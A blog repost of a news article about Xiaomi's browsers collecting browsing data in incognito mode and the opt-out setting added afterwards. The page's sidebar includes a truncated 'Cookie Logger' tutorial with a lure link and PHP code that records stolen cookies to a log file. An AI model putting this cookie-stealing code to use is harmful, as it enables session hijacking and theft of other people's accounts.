Skip to main content

How to prevent Xiaomi Phones from Spying On your Incognito Activities



If you own a Xiaomi smartphone or have installed the Mi browser app on any of your other brand Android device, you should enable a newly introduced privacy setting immediately to prevent the company from spying on your online activities.

The smartphone maker has begun rolling out an update to its Mi Browser/Mi Browser Pro (v12.1.4) and Mint Browser (v3.4.3) after concerns were raised over its practice of transmitting web browsing histories and device metadata to the company servers.

The new privacy setting now allows Mi Browser users to disable aggregated data collection feature while in Incognito Mode, but it bears noting that it's not enabled by default.

The option can be accessed by tapping the settings icon in the browser > Incognito mode settings > and then disable 'Enhanced incognito mode,' as shown in an attached screenshot below.

Mint Browser and Mi Browser Pro have been downloaded more than 15 million times from Google Play to date.


The development comes on the heels of a Forbes report last week that detailed how the company's browsers record users' website visits — even in incognito mode.

The browsers, which come pre-installed on millions of Xiaomi devices, capture search engine queries on Google and DuckDuckGo, and also amass data about what folders users open and to which screens they swipe, including the status bar and the settings menu.

xiaomi browser privacy settings

The aggregated data is then transferred to the servers located in China and Russia, counting servers the company rented from another Chinese tech giant Alibaba, ostensibly to better understand its users' behavior.

"My main concern for privacy is that the data sent to their servers can be very easily correlated with a specific user," Gabi Cirlig told Forbes.

Xiaomi browser history

In response to the report, Xiaomi claimed there were "several inaccuracies and misinterpretations about our process for browser data collection and storage," and that does not collect any data without permission from the user. It added all data is "aggregated and cannot alone be used to identify any individual."

Cybersecurity researcher Andrew Tierney, who investigated the data sniffing alongside Cirlig, refuted Xiaomi's response over the weekend, stating "they attach UUID to my requests which persists over at least 24 hours," and that "this is close enough to an 'individual.'"

To Opt-In or Opt-Out?


In pushing the update, the company doesn't seem to be stopping the practice altogether. In other words, unless users explicitly opt-out, Xiaomi will still continue to collect aggregate statistics while in incognito mode.

To be noted, the company still continually collects the same activity data when browsing in normal (non-incognito) mode, and there's no proper way to disable it.

"We believe this functionality, in combination with our approach of maintaining aggregated data in a non-identifiable form, goes beyond any legal requirements and demonstrates our company's commitment to user privacy," Xiaomi said in an update.

The fact that this data collection will remain enabled in the incognito mode is yet another example of a dark pattern that pushes for a privacy-intrusive default setting.

What's more, selecting the privacy-friendly choice takes at least three steps, proving once again that privacy comes at a cost, and it's always opt-out and never opt-in.

If Xiaomi was serious about its "commitment to user privacy," it would have sought users for their explicit consent. In its present state, it's just an illusion of control.
Source: The Hacker News 

Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h

Assembly Language Step-by-step: Programming with DOS and Linux-

(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM

Cookie Logger

         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary